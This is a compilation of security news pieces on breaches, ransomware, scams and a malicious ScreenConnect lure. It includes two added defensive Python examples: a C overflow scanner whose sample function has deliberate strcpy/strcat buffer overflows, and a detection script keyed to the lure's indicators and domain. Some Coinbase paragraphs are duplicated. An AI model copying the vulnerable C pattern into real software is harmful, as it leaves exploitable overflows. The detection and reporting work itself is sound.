The best way to protect yourself is to keep your extension count as low as possible. Do a routine check on your installed extensions and remove anything you haven't used in a while. I cleared out my old Chrome extensions recently and realized I was carrying add-ons I hadn't touched in months. Before installing anything new, check the developer's credentials, read through recent reviews for anything suspicious, and question any extension asking for broad permissions it doesn't obviously need.
Your browser probably already has built-in features that replace common extensions. Chrome, for instance, now has a native password manager, page translation, reading list, and screenshot tools that make several popular extensions unnecessary. Fewer extensions mean fewer potential entry points for attackers.
For your accounts, replace passwords with passkeys wherever you can and enable 2-factor authentication on everything that supports it. Passkeys can't be intercepted by DOM access since there's nothing to type. Keep your browser updated, and watch for suspicious behavior like tabs auto-opening to gambling, adult, or affiliate pages-- that's often a sign an extension has gone rogue. The Wisconsin researchers also recommend that websites change how they handle sensitive input fields so passwords aren't exposed in HTML, but that's on developers to fix, not something you can control.
We should pay a little attention to what we install
The most dangerous extensions aren't the ones built to be malicious from day one, but the ones that are popular and well-maintained that get bought by a threat actor or compromised through a supply chain attack without users ever knowing. One day, they're blocking ads or managing tabs, the next, they're quietly harvesting your credentials through an update you never noticed.
There's no single fix for this. Browser stores are doing their best with automated reviews and manual checks, but sleeper campaigns have shown they can stay undetected for years. The best you can do is keep your extension list short, stay skeptical about permissions, and use passkeys and 2-factor authentication as a safety net for when something inevitably slips through.
Flickr discloses Potential Data Breach exposing Users' Names, Emails
By Sergiu Gatlan for bleepingcomputer
Photo-sharing platform Flickr is notifying users of a potential data breach after a vulnerability at a 3rd-party email service provider exposed their real names, email addresses, IP addresses, and account activity.
Founded in 2004, Flickr is one of the world's largest photography communities and sharing sites, hosting over 28 billion photos and videos. The company says it has 35 million monthly users and 800 million monthly page views.
Flickr did not disclose which 3rd-party provider was involved or how many users were potentially affected by this incident. A Flickr spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today for more details.
The company said that it shut down access to the affected system within hours after being informed of the security flaw on February 5. While the vulnerability "may have" provided access to some member information, Flickr said that passwords and payment card numbers were not compromised in the incident.
"On February 5, 2026, we were alerted to a vulnerability in a system operated by one of our email service providers," the company said in emails to affected users. "This flaw may have allowed unauthorized access to some Flickr member information. We shut down access to the affected system within hours of learning about it."
The exposed information includes member names, email addresses, Flickr usernames, account types, IP addresses, general location data, and their activity on the platform.
The company has also encouraged affected users to review their account settings for any unexpected changes and to remain vigilant against phishing emails that may use their Flickr account information, noting that it will never request passwords over email.
Users are also recommended to update their passwords as soon as possible if they use their Flickr credentials on other services.
"We sincerely apologize for this incident and for the concern it may cause," Flickr added in the emailed notifications.
"We take the privacy and security of your data extremely seriously, and we are taking immediate action to prevent any similar issues by conducting a thorough investigation, strengthening our system architecture, & further enhancing our monitoring of 3rd-party service providers."
Birmingham Mental Health Authority warns 30,000+ People of Data Breach that leaked SSNs and Medical info
By Paul Bischoff for Comparitech
The Jefferson Blount St. Claire Mental Health Authority in Birmingham, Alabama has notified 30,434 people of a November 2025 data breach, according to a new breach disclosure by the US Department of Health and Human Services.
The breach compromised the following personal info:
- Names
- Social Security numbers
- Health insurance info
- Dates of birth
- Medical info including:
  - Billing and claims info
  - Diagnoses
  - Physician info
  - Medical record numbers
  - Medicare/Medicaid info
  - Prescriptions and medications
  - Diagnostic and treatment info
The data was collected by the JBS Mental Health Authority between 2011 and 2025.
A ransomware group called Medusa took credit for the breach on December 23, 2025 and demanded a $200,000 ransom to destroy 168.6 GB of stolen data. To prove its claim, Medusa posted sample images of what it says are documents stolen from JBS' servers.
JBS has not acknowledged Medusa's claim. Comparitech cannot verify the authenticity of the posted data. We do not know if JBS paid a ransom or how attackers breached its network. JBS declined to comment on the record when contacted by Comparitech.
"On or around November 25, 2025, JBS learned that it was the victim of a ransomware attack," says JBS' notice (PDF) to victims. "Through the investigation, it was determined that unauthorized access to the network occurred on November 25, 2025. During that time certain files may have been subject to unauthorized access and/or acquisition. The files involved could relate to certain patients or employees between the years of 2011 and 2025."
The notice does not mention any offer of free credit monitoring or identity theft protection for victims.
Medusa first appeared in September 2019 and debuted its leak site in February 2023, where it publishes stolen data of organizations that don't pay ransoms. Medusa both locks down computer systems and steals data, forcing infected organizations to pay a ransom to restore systems and to not publish stolen data. The gang operates a ransomware-as-a-service scheme in which customers pay to use Medusa's malware and infrastructure to launch attacks and collect ransoms.
In 2025, Medusa claimed responsibility for 35 confirmed ransomware attacks, plus 153 attack claims that haven't been publicly acknowledged by the targeted organizations. The confirmed attacks compromised the personal data of 1.76 million people.
Over half of Medusa's confirmed attacks struck healthcare providers like JBS, and those attacks account for the vast majority-- 1.65 million-- of the group's breach victims. Medusa demands providers pay $454,000 in ransom on average.
Pulse Urgent Care Center in California also recently started warning patients about a Medusa-claimed breach that occurred in March 2025. Following the breach, Medusa demanded $120,000 in ransom for 60.7 GB of data.
Ransomware attacks on US healthcare
Comparitech researchers logged 113 confirmed ransomware attacks in 2025 on US hospitals, clinics, and other healthcare providers. The resulting data breaches compromised the personal data of more than 8.9 million people.
Some of those attacks include:
- Neurological Associates of Washington notified 13,500 people of a December 2025 data breach claimed by DragonForce
- MACT Health Board reported a November 2025 data breach for which Rhysida demanded $662,000
- Alpine Ear, Nose & Throat notified 65,648 people of a November 2025 data breach claimed by BianLian
Ransomware attacks on US hospitals, clinics, and other care providers can steal data and lock down infected computer systems. They can cripple critical systems and endanger the health, privacy, and security of patients. Infected hospitals and clinics must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk. Hospitals and clinics might resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.
About the Jefferson Blount St. Claire Mental Health Authority
The JBS Mental Health Authority in Birmingham, Alabama runs four mental health facilities in 3 counties: Jefferson, Blount, and St. Clair.
Claude Opus 4.6 Finds 500+ High-Severity Flaws Across Major Open-Source Libraries
By Ravie Lakshmanan for The Hacker News
Artificial intelligence (AI) company Anthropic revealed that its latest large language model (LLM), Claude Opus 4.6, has found more than 500 previously unknown high-severity security flaws in open-source libraries, including Ghostscript, OpenSC, and CGIF.
Claude Opus 4.6, which was launched Thursday, comes with improved coding skills, including code review and debugging capabilities, along with enhancements to tasks like financial analyses, research, and document creation.
Stating that the model is "notably better" at discovering high-severity vulnerabilities without requiring any task-specific tooling, custom scaffolding, or specialized prompting, Anthropic said it is putting it to use to find and help fix vulnerabilities in open-source software.
"Opus 4.6 reads and reasons about code the way a human researcher would-- looking at past fixes to find similar bugs that weren't addressed, spotting patterns that tend to cause problems, or understanding a piece of logic well enough to know exactly what input would break it," it added.
Prior to its debut, Anthropic's Frontier Red Team put the model to test inside a virtualized environment and gave it the necessary tools, such as debuggers and fuzzers, to find flaws in open-source projects. The idea, it said, was to assess the model's out-of-the-box capabilities without providing any instructions on how to use these tools or providing information that could help it better flag the vulnerabilities.
The company also said it validated every discovered flaw to make sure that it was not made up-- i.e., hallucinated-- and that the LLM was used as a tool to prioritize the most severe memory corruption vulnerabilities that were identified.
Some of the security defects that were flagged by Claude Opus 4.6 are listed below. They have since been patched by the respective maintainers.
- Parsing the Git commit history to identify a vulnerability in Ghostscript that could result in a crash by taking advantage of a missing bounds check
- Searching for function calls like strrchr() and strcat() to identify a buffer overflow vulnerability in OpenSC
- A heap buffer overflow vulnerability in CGIF, fixed in version 0.5.1
"This vulnerability is particularly interesting because triggering it requires a conceptual understanding of the LZW algorithm and how it relates to the GIF file format," Anthropic said of the CGIF bug. "Traditional fuzzers-- and even coverage-guided fuzzers-- struggle to trigger vulnerabilities of this nature because they require making a particular choice of branches."
"In fact, even if CGIF had 100% line- and branch-coverage, this vulnerability could still remain undetected: it requires a very specific sequence of operations."
The company has pitched AI models like Claude as a critical tool for defenders to "level the playing field." But it also emphasized that it will adjust and update its safeguards as potential threats are discovered and put in place additional guardrails to prevent misuse.
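The OpenSC item listed above describes finding an overflow by searching for strrchr()/strcat() call sites. As an added example in the same spirit (not Anthropic's tooling and not OpenSC's code), this Python triage pass collects fixed-size `char name[N]` declarations in a C source file and flags unbounded string writes into them; the sample C function is constructed, and the single-namespace buffer lookup is a deliberate simplification.

```python
"""Added example, not Anthropic's tooling or OpenSC's code: a triage pass that
looks for the strcat()-into-fixed-buffer shape behind many C overflows.  It
collects `char name[N]` declarations, then flags unbounded writers whose
destination is one of them.  The C source below is constructed for the demo."""
import re

# `char name[N]` with a literal size: the fixed-size destinations we care about.
FIXED_ARRAY = re.compile(r"\bchar\s+(\w+)\s*\[\s*(\d+)\s*\]")
# Writers that take no destination length; group 2 is the destination buffer.
UNBOUNDED = re.compile(r"\b(strcpy|strcat|sprintf|gets)\s*\(\s*(\w+)")
# Bounded replacements a reviewer would suggest.
SAFER = {"strcpy": "strlcpy or snprintf", "strcat": "strlcat or snprintf",
         "sprintf": "snprintf", "gets": "fgets"}


def find_fixed_buffers(src: str) -> dict:
    """Map buffer name -> declared size.  Simplification: one namespace for
    the whole file rather than per-function scope."""
    return {m.group(1): int(m.group(2)) for m in FIXED_ARRAY.finditer(src)}


def scan_c_source(src: str) -> list:
    """Return one finding per unbounded write into a fixed-size buffer."""
    buffers = find_fixed_buffers(src)
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        code = line.split("//", 1)[0]          # ignore trailing line comments
        for m in UNBOUNDED.finditer(code):
            func, dest = m.group(1), m.group(2)
            if dest in buffers:
                findings.append({
                    "line": lineno, "func": func, "dest": dest,
                    "size": buffers[dest], "suggest": SAFER[func],
                })
    return findings


def format_findings(findings: list) -> str:
    """Render findings as one reviewer-style line each."""
    return "\n".join(
        f"line {f['line']}: {f['func']}() writes into {f['dest']}[{f['size']}] "
        f"with no length check; consider {f['suggest']}"
        for f in findings)


# Constructed sample: the strrchr()/strcat() shape from the article, with one
# correctly bounded snprintf() call that must not be flagged.
SAMPLE_SRC = """\
#include <string.h>
#include <stdio.h>

int build_path(const char *dir, const char *name) {
    char path[64];
    char ext[8];
    strcpy(path, dir);                         /* unbounded copy */
    strcat(path, "/");                         /* unbounded append */
    strcat(path, name);
    snprintf(ext, sizeof ext, ".%s", "der");   /* bounded: not flagged */
    const char *dot = strrchr(path, '.');
    return dot != NULL;
}
"""

if __name__ == "__main__":
    print(format_findings(scan_c_source(SAMPLE_SRC)))
```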
The disclosure comes weeks after Anthropic said its current Claude models can succeed at multi-stage attacks on networks with dozens of hosts using only standard, open-source tools by finding and exploiting known security flaws.
"This illustrates how barriers to the use of AI in relatively autonomous cyber workflows are rapidly coming down, and highlights the importance of security fundamentals like promptly patching known vulnerabilities," it said.
Coinbase Confirms Insider Breach linked to Leaked Support Tool Screenshots
By Lawrence Abrams for bleepingcomputer
Coinbase has confirmed an insider breach after a contractor improperly accessed the data of approximately thirty customers, which BleepingComputer has learned is a new incident that occurred in December.
"Last year our security team detected that a single Coinbase contractor improperly accessed customer information, impacting a very small number of users-- approximately 30"-- a Coinbase spokesperson told BleepingComputer.
"The individual no longer performs services for Coinbase. Impacted users were notified last year and were provided with identity theft protection services and other guidance. We have also disclosed this incident to the relevant regulators, as is standard practice."
BleepingComputer has learned that this is a newly revealed insider breach and is not related to the previously disclosed TaskUs insider breach in January 2025.
This statement comes after threat actors known as "Scattered Lapsus Hunters" (SLH) briefly posted screenshots of an internal Coinbase support interface on Telegram and then deleted the posts soon after.
The screenshots showed a support panel that gave access to customer information, including email addresses, names, date of birth, phone numbers, KYC information, cryptocurrency wallet balances, and transactions.
It is not uncommon for screenshots and stolen data to be passed around among different threat actors before being leaked or disclosed, so it is unclear whether this group was behind the insider breach or whether other threat actors carried it out.
"Last year our security team detected that a single Coinbase contractor improperly accessed customer information, impacting a very small number of users, approximately 30," a Coinbase spokesperson told BleepingComputer.
"The individual no longer performs services for Coinbase. Impacted users were notified last year and were provided with identity theft protection services and other guidance. We have also disclosed this incident to the relevant regulators, as is standard practice."
BleepingComputer has learned that this is a newly revealed insider breach and is not related to the previously disclosed TaskUs insider breach in January 2025.
This statement comes after threat actors known as "Scattered Lapsus Hunters" (SLH) briefly posted screenshots of an internal Coinbase support interface on Telegram and then deleted the posts soon after.
The screenshots showed a support panel that gave access to customer information, including email addresses, names, date of birth, phone numbers, KYC information, cryptocurrency wallet balances, and transactions.
It is not uncommon for screenshots and stolen data to be passed around among different threat actors before being leaked or disclosed, so it is unclear whether this group was behind the insider breach or whether other threat actors carried it out.
However, the same threat actors previously claimed to have bribed an insider at CrowdStrike to share screenshots of internal applications.
BPOs under attack
Over the past few years, Business Process Outsourcing (BPO) companies have become increasingly targeted by threat actors seeking access to customer data, internal tools, or corporate networks.
A Business Process Outsourcing (BPO) company is a third-party firm that performs operational tasks for another organization. These tasks commonly include customer support, identity verification, IT help desk services, and account management.
Because BPO employees often have access to sensitive internal systems and customer information, they have become a high-value target for attackers.
In the past year, threat actors have exploited BPOs through bribing insiders with legitimate access, social engineering support staff to grant unauthorized access, and compromising BPO employee accounts to reach internal systems.
As we have seen with Coinbase this year, one way BPOs are targeted is by bribing their employees to steal or share customer information.
Coinbase disclosed a similar data breach last year, later linked to external customer support representatives employed by TaskUs, an outsourcing firm that provides services to the crypto exchange.
Another common tactic is social engineering attacks against outsourced IT and support desks, where threat actors impersonate employees and call BPO help lines to obtain access to internal corporate systems.
In one of the most prominent cases, attackers posed as an employee and convinced a Cognizant help desk support agent to grant them access to a Clorox employee account, allowing them to breach the company's network. The incident later became the focus of a $380 million lawsuit by Clorox against Cognizant.
Google also reported that threat actors targeted US insurance firms in social engineering attacks on outsourced help desks to gain access to internal systems.
Retailers also confirmed that social engineering attacks against support personnel enabled ransomware and data theft attacks.
Marks & Spencer confirmed attackers used social engineering to breach its networks, while Co-op disclosed data theft following a ransomware attack that similarly abused support staff access.
In response to the attacks on M&S and Co-op retail companies, the UK government issued guidance on social engineering attacks against help desks and BPOs.
In some cases, hackers target the BPO employee accounts themselves to gain access to the customer data they manage.
In October, Discord disclosed a data breach that allegedly exposed data from 5.5 million unique users after its Zendesk support system instance was compromised.
While the company did not confirm how its instance was breached, the threat actors told BleepingComputer that they used a compromised account belonging to a support agent employed by a business process outsourcing (BPO) provider. Using this account, they downloaded Discord's customer data.
This repeated abuse of outsourced support providers shows how threat actors are increasingly bypassing vulnerability exploits and instead targeting third-party companies with access to corporate networks and data.
How Fake Party Invitations are being used to install Remote Access Tools
By Stefan Dasic for Malwarebytes
"You're invited!"
It sounds friendly, familiar and quite harmless. But in a scam we recently spotted, that simple phrase is being used to trick victims into installing a full remote access tool on their Windows computers, giving attackers complete control of the system.
What appears to be a casual party or event invitation leads to the silent installation of ScreenConnect, a legitimate remote support tool quietly installed in the background and abused by attackers.
Here's how the scam works, why it's effective, and how to protect yourself.
The email: A party invitation
Victims receive an email framed as a personal invitation, often written to look like it came from a friend or acquaintance. The message is deliberately informal and social, lowering suspicion and encouraging quick action.
In the screenshot below, the email arrived from a friend whose email account had been hacked, but it could just as easily come from a sender you don't know.
So far, we've only seen this campaign targeting people in the UK, but there's nothing stopping it from expanding elsewhere.
Clicking the link in the email leads to a polished invitation page hosted on an attacker-controlled domain.
The invite: The landing page that leads to an installer
The landing page leans heavily into the party theme, but instead of showing event details, it nudges the user toward opening a file. It relies on several cues, none of which look dangerous on their own, but together they keep the user focused on the "invitation" file:
- A bold "You're Invited!" headline
- The suggestion that a friend had sent the invitation
- A message saying the invitation is best viewed on a Windows laptop or desktop
- A countdown suggesting your invitation is already "downloading"
- A message implying urgency and social proof-- "I opened mine and it was so easy!"
Within seconds, the browser is redirected to download RSVPPartyInvitationCard.msi.
The page even triggers the download automatically to keep the victim moving forward without stopping to think.
This MSI file isn't an invitation. It's an installer.
The guest: What the MSI actually does
When the user opens the MSI file, it launches msiexec.exe and silently installs ScreenConnect Client, a legitimate remote access tool often used by IT support teams.
There's no invitation, RSVP form, or calendar entry.
What happens instead:
- ScreenConnect binaries are installed under C:\Program Files (x86)\ScreenConnect Client\
- A persistent Windows service is created (for example, ScreenConnect Client 18d1648b87bb3023)
- ScreenConnect installs multiple .NET-based components
- There is no clear user-facing indication that a remote access tool is being installed
From the victim's perspective, very little seems to happen. But at this point, the attacker can now remotely access their computer.
The after-party: Remote access is established
Once installed, the ScreenConnect client initiates encrypted outbound connections to ScreenConnect's relay servers, including a uniquely assigned instance domain.
That connection gives the attacker the same level of access as a remote IT technician, including the ability to:
- See the victim's screen in real time
- Control the mouse and keyboard
- Upload or download files
- Keep access even after the computer is restarted
Because ScreenConnect is legitimate software commonly used for remote support, its presence isn't always obvious. On a personal computer, the first signs are often behavioral, such as unexplained cursor movement, windows opening on their own, or a ScreenConnect process the user doesn't remember installing.
Why this scam works
This campaign is effective because it targets normal, predictable human behavior. From a behavioral security standpoint, it exploits our natural curiosity and appears to be a low risk.
Most people don't think of invitations as dangerous. Opening one feels passive, like glancing at a flyer or checking a message, not installing software.
Even security-aware users are trained to watch out for warnings and pressure. A friendly "you're invited" message doesn't trigger those alarms.
By the time something feels off, the software is already installed.
Signs your computer may be affected - Watch for:
- A download or executed file named RSVPPartyInvitationCard.msi
- An unexpected installation of ScreenConnect Client
- A Windows service named ScreenConnect Client with random characters
- Your computer makes outbound HTTPS connections to ScreenConnect relay domains
- Your system resolves the invitation-hosting domain used in this campaign, xnyr[.]digital
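The signs listed above translate directly into host-level detection logic. The following Python triage script is an added example, not Malwarebytes code: it runs the write-up's indicators (the lure MSI name, the ScreenConnect Client service with a random hex suffix, the install directory, and the xnyr[.]digital domain) over constructed, pre-normalized event records, and skips ScreenConnect instances an IT team has allow-listed as expected. The record layout, hostnames, file names and the instance IDs other than the one quoted in the write-up are assumptions made for the example; the Windows event sources named in comments are the usual places such records come from.

```python
"""Host triage for the party-invitation / ScreenConnect lure.

Added example, not Malwarebytes code. Events are constructed here in a
normalized dict form; comments note which Windows source each rule would
normally read (Service Control Manager 7045, MsiInstaller 11707, Sysmon 11/22).
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Service name quoted in the write-up: "ScreenConnect Client 18d1648b87bb3023".
# Assumption: the suffix is 16 hex characters; parentheses are also accepted.
SERVICE_RE = re.compile(r"^ScreenConnect Client\s*\(?([0-9a-f]{16})\)?$", re.I)
LURE_MSI = "rsvppartyinvitationcard.msi"            # installer name from the write-up
LURE_DOMAIN = "xnyr.digital"                         # landing domain from the write-up
INSTALL_DIR = r"c:\program files (x86)\screenconnect client"


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def defang(name: str) -> str:
    """Render a domain so it is not clickable in a report: xnyr[.]digital."""
    return name.replace(".", "[.]")


def check_event(ev: dict, expected_instances: frozenset = frozenset()) -> Optional[Finding]:
    """Map one normalized event to a Finding, or None if it looks benign.

    expected_instances holds ScreenConnect instance IDs that IT deployed on
    purpose; those are not flagged, matching the write-up's advice to confirm
    whether a remote tool is expected rather than treating every one as hostile.
    """
    host, kind = ev["host"], ev["kind"]
    if kind == "service_installed":            # System log, Service Control Manager 7045
        m = SERVICE_RE.match(ev["service_name"])
        if m and m.group(1).lower() not in expected_instances:
            return Finding(host, "unexpected_screenconnect_service", ev["service_name"])
    elif kind == "msi_installed":              # Application log, MsiInstaller 11707
        if "screenconnect client" in ev["product"].lower():
            return Finding(host, "screenconnect_msi_install", ev["product"])
    elif kind == "file_created":               # e.g. Sysmon event 11 or EDR file telemetry
        path = ev["path"].lower()
        if path.rsplit("\\", 1)[-1] == LURE_MSI:
            return Finding(host, "lure_installer_on_disk", ev["path"])
        if path.startswith(INSTALL_DIR):
            return Finding(host, "screenconnect_binary_written", ev["path"])
    elif kind == "dns_query":                  # e.g. Sysmon event 22 or DNS server logs
        if ev["query"].lower().rstrip(".") == LURE_DOMAIN:
            return Finding(host, "resolved_lure_domain", defang(ev["query"]))
    return None


def triage(events: Iterable[dict], expected_instances: frozenset = frozenset()) -> Dict[str, List[Finding]]:
    """Group findings per host so an analyst sees the whole chain on one machine."""
    per_host: Dict[str, List[Finding]] = {}
    for ev in events:
        f = check_event(ev, expected_instances)
        if f is not None:
            per_host.setdefault(f.host, []).append(f)
    return per_host


def likely_compromised(findings: List[Finding]) -> bool:
    """An unexpected ScreenConnect service plus the lure file or domain is the
    strongest sign the invitation was opened, not just that ScreenConnect exists."""
    rules = {f.rule for f in findings}
    return "unexpected_screenconnect_service" in rules and (
        "lure_installer_on_disk" in rules or "resolved_lure_domain" in rules)


# Constructed sample telemetry: one victim, one IT-managed host, one unrelated host.
SAMPLE_EVENTS = [
    {"host": "LAPTOP-01", "kind": "dns_query", "query": "xnyr.digital"},
    {"host": "LAPTOP-01", "kind": "file_created",
     "path": r"C:\Users\sam\Downloads\RSVPPartyInvitationCard.msi"},
    {"host": "LAPTOP-01", "kind": "msi_installed",
     "product": "ScreenConnect Client (18d1648b87bb3023)"},      # product string constructed
    {"host": "LAPTOP-01", "kind": "service_installed",
     "service_name": "ScreenConnect Client 18d1648b87bb3023"},
    {"host": "LAPTOP-01", "kind": "file_created",
     "path": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe"},
    # Helpdesk workstation: ScreenConnect deployed on purpose, instance allow-listed below.
    {"host": "HELPDESK-07", "kind": "service_installed",
     "service_name": "ScreenConnect Client (0123456789abcdef)"},
    {"host": "PC-02", "kind": "service_installed", "service_name": "Spooler"},
]
EXPECTED_INSTANCES = frozenset({"0123456789abcdef"})   # hypothetical IT-approved instance


if __name__ == "__main__":
    for host, findings in triage(SAMPLE_EVENTS, EXPECTED_INSTANCES).items():
        verdict = "LIKELY COMPROMISED" if likely_compromised(findings) else "review"
        print(f"{host}: {verdict}")
        for f in findings:
            print(f"  [{f.rule}] {f.detail}")
```

Feeding real records requires only mapping each log source into the same dict shape; the allow-list is what keeps legitimate IT use of ScreenConnect from drowning the alert.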
How to stay safe
This campaign is a reminder that modern attacks often don't break in; they're invited in. Remote access tools give attackers deep control over a system. Acting quickly can limit the damage.
For individuals - If you receive an email like this:
- Be suspicious of invitations that ask you to download or open software
- Never run MSI files from unsolicited emails
- Verify invitations through another channel before opening anything
If you already clicked or ran the file:
- Disconnect from the internet immediately
- Check for ScreenConnect and uninstall it if present
- Run a full security scan
- Change important passwords from a clean, unaffected device
For organizations (especially in the UK)
- Alert on unauthorized ScreenConnect installations
- Restrict MSI execution where feasible
- Treat "remote support tools" as high-risk software
- Educate users: invitations don't come as installers
This scam works by installing a legitimate remote access tool without clear user intent. That's exactly the gap Malwarebytes is designed to catch.
Malwarebytes now detects newly installed remote access tools and alerts you when one appears on your system. You're then given a choice: confirm that the tool is expected and trusted, or remove it if it isn't.
OfferUp Scammers are Out in Force: What You Should Know
By Phil Muncaster for We Live Security
The mobile marketplace app has a growing number of users, but not all of them are genuine. Watch out for these common scams.
OfferUp has been in business for nearly 15 years. Although little known outside the US, the marketplace app competes for consumer hearts and minds with industry giants Craigslist, Facebook Marketplace and eBay. And like them, it has a problem with fraud. If you're looking to buy or sell on the platform and want to steer clear of the scammers, read on.
Top 10 OfferUp scams
OfferUp claims to process over 30 million transactions each year. That's inevitably going to attract some users with nefarious motives. Here are the most common scams you may encounter on the platform:
Counterfeit items
Beware of high-value items that turn out to be rip-offs. The seller will typically try to persuade you to pay via a third-party service (e.g., Zelle or Venmo) rather than through the app, since doing so means the item won't be covered by OfferUp's Purchase Protection.
Payment scam
As above, scammers, whether buyers or sellers, will often try to trick you into transacting via third-party cash app services. They may:
- Promise to pay above the asking price for a product you're selling, in order to persuade you to agree to them using a cash app. They then overpay using a stolen account or fake check, and ask for a refund. If you pay it, you'll eventually be down the refund, plus your item, and may be asked to repay the original fraudulent sum
- Ask to pay via gift cards, which turn out to be fake or with zero value
- Claim to be out-of-town sellers, requesting cash-app payment for items they never end up shipping
Account takeover
A buyer asks you for a verification code in order to 'verify' your listing, for instance through Google Voice. In fact, they're usually trying to log into your account and need the 2-factor authentication code sent by OfferUp. If you hand it over, they get control of your account, enabling them to access your personal information and potentially use your account to scam others.
Empty box
Some sellers add disclaimers in a lengthy item description saying they are only offering the box or a digital photo of the item. So when it arrives, all you'll receive is an empty box.
Phishing links
Scam buyers and sellers might send you a message saying something like "click here to get paid" or "click to verify your info". Doing so will take you to a phishing site where you'll be asked to fill in your logins, payment details and/or other sensitive personal information.
Email phishing
Some buyers or sellers might ask for your email address or phone number during the transaction process. They'll use it to spam you with malicious links designed to steal your information or install malware on your device.
Deposit scam
A seller posts a high-value item, offering to deliver it to you as long as you put a deposit down to secure it. It turns out the item doesn't exist, and you've lost the deposit.
Bouncing checks
A scammer pays for an item you're selling via check, which bounces several days later, leaving you without the item and no payment.
Investment opportunity
A seller posts a listing about an "investment opportunity" or similar, but requires you to send money first.
Fake jobs
Scammers may pose as employers that require upfront payment for 'background checks' or similar. Alternatively, they may request you fill in your personal and financial details as part of the 'application process,' which they can use for identity fraud.
What OfferUp protects
OfferUp offers 2-day Purchase Protection for buyers, meaning that you have 48 hours from delivery to file a claim for items:
- Significantly not as described
- Damaged in transit
- Counterfeit
You can also file for items not received and/or empty box scams.
However, OfferUp will not offer protection for anything purchased off-app, for anything that violates its rules (e.g., gift cards, alcohol), or for anything that was paid for in cash, in person.
What to look out for
When you're browsing the app, the following should all be red flags:
- Deals that are too good to be true, usually from fraudulent sellers who want you to put a deposit down, or scam buyers wanting to persuade you into transacting off app.
- A buyer profile with no history. This isn't necessarily a scammer, but it pays to be extra cautious
- A suggested meetup point that's not a Community Meetup Spot, as this could indicate they want the transaction not to be observed
- A buyer/seller asks for a verification code, which they actually want to log into your account
- Buyers/sellers send you messages containing links to 'verify' or similar
- A seller tries to use urgency to rush you into making an unwise decision, like buying a counterfeit item or putting a deposit down for a non-existent item.
- Emotional manipulation, such as scammers saying they can't meet in person because they are in the military or out of town on family emergency
- Phrases like "box only," "digital photo," or "replica" hidden in a lengthy product description
- Requests to pay off app
- Stock photos of items rather than ones they've taken themselves, indicating they don't actually own the product
- Overpayment for an item
Staying safe
To stay safe on the app, the advice is very simple: don't leave it and don't click on any dubious links. That means never leaving the app for messaging or payments, never handing over your personal details, and not responding to messages with links in them. If you arrange an in-person sale, make sure it's at a Community Meetup Spot. And if you want to be ultra careful, only buy from or sell to a user with a "TruYou" badge on their profile, indicating their identity has been verified.
I've been scammed, what next?
If the worst-case scenario comes to pass, report the scam to OfferUp immediately, in case you're covered by the firm's 2-day Purchase Protection. In Messages, tap the conversation with the scammer and the 3-dots in the corner, then Report. Submit a Purchase Protection claim in the OfferUp Help Center.
If you've paid outside of the app, contact your bank to file a chargeback (if it was a card payment) or file a report with the cash app you paid with. The latter is unlikely to get your money back, but may help get the scammer banned.
If you've shared personal information or a verification code with a scammer, change your app passwords, and do the same for any sites you reuse the same credential on. Monitor your bank accounts for unusual activity. And be wary of any follow-up phishing attempts that pop into your inbox/messages.
Finally, consider reporting the scam to the authorities, e.g., the FTC, the FBI or Report Fraud (UK). Before you delete messages or block the user, take screenshots of the original listing, the scammer's profile, your chat history and any payment receipts.
OfferUp is a great way to pick up bargains in your area, or make a little extra money from items you no longer need. But remember, not everyone is acting in good faith.
Seattle-area Neurologist warns 13,500 People of Data Breach that Leaked SSNs, Medical Info
By Paul Bischoff for Comparitech
Neurological Associates of Washington near Seattle this week confirmed it notified 13,500 state residents of a December 2025 data breach that compromised the following info:
- Names
- Social Security numbers
- Diagnoses
- Disability codes
- Medical info
- Dates of birth
- Addresses
- Other types of information
A cybercriminal group called DragonForce took credit for the attack on December 27, 2025, saying it stole 1.4 TB of data from the clinic. To prove its claim, DragonForce posted sample images of what it says are documents stolen from Neurological Associates of Washington.
Neurological Associates of Washington cited DragonForce as the attacker, but Comparitech cannot verify the authenticity of the allegedly stolen data. We do not know if Neurological Associates of Washington paid a ransom, how much DragonForce demanded, or how attackers breached the clinic's network. Comparitech contacted Neurological Associates of Washington for comment and will update this article if it replies.
"Our facilities server that stored medical records from 2019-2025 was attacked and encrypted. We discovered some of the data on one of our computers was stolen," says the clinic's notice to victims.
Neurological Associates of Washington is offering eligible data breach victims 12 months of free credit monitoring.
Who is DragonForce?
DragonForce is a ransomware gang that first started claiming responsibility for attacks on its leak site in December 2023. It operates a ransomware-as-a-service business in which customers pay to use DragonForce's malware and infrastructure to launch attacks and collect ransoms. DragonForce often extorts victims both to unlock infected systems and to destroy stolen data.
DragonForce has claimed responsibility for 51 confirmed ransomware attacks since it began, plus 211 unconfirmed attack claims that haven't been publicly acknowledged by the targeted organizations. The confirmed attacks breached more than 7.6 people's personal records.
10 of DragonForce's confirmed victims were healthcare providers like Neurological Associates of Washington. Around the same time as that attack, DragonForce also hacked Centro Médico Palafox in Spain. And the group's largest such attack hit Asheville Eye Associates in December 2024, which later notified 204,984 people.
Ransomware attacks on US healthcare
Comparitech researchers logged 111 confirmed ransomware attacks on US hospitals, clinics, and other healthcare providers in 2025. Those attacks compromised the personal information of more than 8.9 million people.
Other such recently confirmed attacks include:
- Alpine Ear, Nose, & Throat (CO) notified 65,648 people of a December 2024 data breach claimed by the BianLian ransomware group
- Spindletop Center (TX) reported a September 2025 data breach for which Rhysida demanded $1.65 million
- MACT Health Board (CA) reported a November 2025 data breach for which Rhysida demanded $661,000.
- Center for Life Resources (TX) reported a November 2025 data breach claimed by Sinobi
Ransomware attacks on US hospitals, clinics, and other care providers can steal data and lock down infected computer systems. They can cripple critical systems and endanger the health, privacy, and security of patients. Infected hospitals and clinics must pay a ransom or face extended downtime, data loss, and putting patients and staff at increased risk. Hospitals and clinics might resort to pen and paper, cancel appointments, and divert patients elsewhere until systems are restored.
About Neurological Associates of Washington
Neurological Associates of Washington is a neurologist clinic located in the Seattle suburb of Kirkland, Washington.
Cloud Storage Payment Scam Floods Inboxes with Fake Renewals
By Lawrence Abrams for bleepingcomputer
Over the past few months, a large-scale cloud storage subscription scam campaign has been targeting users worldwide with repeated emails falsely warning recipients that their photos, files, and accounts are about to be blocked or deleted due to an alleged payment failure.
